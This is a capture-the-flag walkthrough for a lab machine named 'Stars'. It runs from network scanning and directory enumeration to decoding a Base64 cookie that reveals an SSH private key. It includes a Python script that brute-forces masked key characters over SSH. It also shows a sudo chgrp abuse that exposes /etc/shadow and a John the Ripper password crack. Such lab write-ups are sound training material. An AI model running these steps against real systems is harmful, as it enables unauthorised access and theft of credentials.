Stars
To begin with, we obtain the IP of the victim machine using the following command:
arp-scan -I eth0 --localnet
And now we perform a quick scan of all its ports to see which ones are open.
nmap -sS -p- --min-rate 4500 -n -Pn IP

Now we conduct a more detailed scan of those ports.
nmap -sCV -p22,80 -n -Pn IP

We enter the website hosted on this machine and come across the following text:

I decide to list directories and files using the Gobuster tool, and we come across a .txt file that gives us a clue.
gobuster dir -u http://IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,zip,php -t 130


We also obtain a possible username.
The next step is to use Burp Suite, where we come across a Cookie that appears to be text in Base64 format.

We decode it, and this is the result:
echo "cG9pc29uZWRnaWZ0LnR4dA==" | base64 -d

It turns out we have found a new hidden file on the website. It seems to be the private key for SSH access.

But it seems we can't use it yet, as sshnote.txt file mentioned. I create a file called id_rsa.txt with the content of the private key and decide to quickly create a program using AI to automate the process of combining and testing the private key until eventually one combination is correct. Here's the code:
import subprocess
import itertools
import os
# SSH credentials
ip = 'IP'
username = 'sophie'
# Path to the file containing the private key
private_key_path = './id_rsa.txt'
# Read the private key from the file
with open(private_key_path, 'r') as file:
private_key_data = file.read()
# Generate all possible combinations of uppercase letters
letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
combinations = itertools.product(letters, repeat=3)
# Iterate over the combinations and try SSH with each one
for combo in combinations:
key = ''.join(combo)
# Write the key to a temporary file
with open('temp_key_file', 'w') as key_file:
key_file.write(private_key_data.replace('***', key))
try:
# Change permissions of the temporary key file
os.chmod('temp_key_file', 0o600) # Permissions only for the owner
# Execute SSH using the temporary key file
ssh_command = f'ssh -i temp_key_file {username}@{ip}'
subprocess.run(ssh_command, shell=True, check=True)
print(f'Successful SSH connection using key: {key}')
os.remove('temp_key_file') # Remove the temporary key file
break # Stop the loop if a valid key is found
except subprocess.CalledProcessError:
print(f'Error: Authentication failed with key: {key}')
except Exception as e:
print(f'Error: {e}')
Finally, we give permissions to the file, execute it, and we're in:
chmod +x auto_ssh.py

And we obtain the User Flag.
Now, with the command "sudo -l" we observe that we can execute the chgrp binary as the root user with sudo without a password.

Let's see how it's used with the following command:
sudo -u root /usr/bin/chgrp --help

So, we can change the group of the files we want. What I do is change the group of the file /etc/shadow to sophie.
sudo -u root /usr/bin/chgrp sophie /etc/shadow
We open it with cat and copy the line where root is located, then paste it into a file on our local machine named shadow.txt. Now, we'll open the file /etc/passwd and do the same as before, but copy and paste the content into a file named passwd.txt.
Now, let's decrypt the root user's password. To do this, we'll use unshadow and John The Ripper:
unshadow passwd.txt shadow.txt > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
And we find the root password:

Finally, we access root and obtain the Root Flag.

Last updated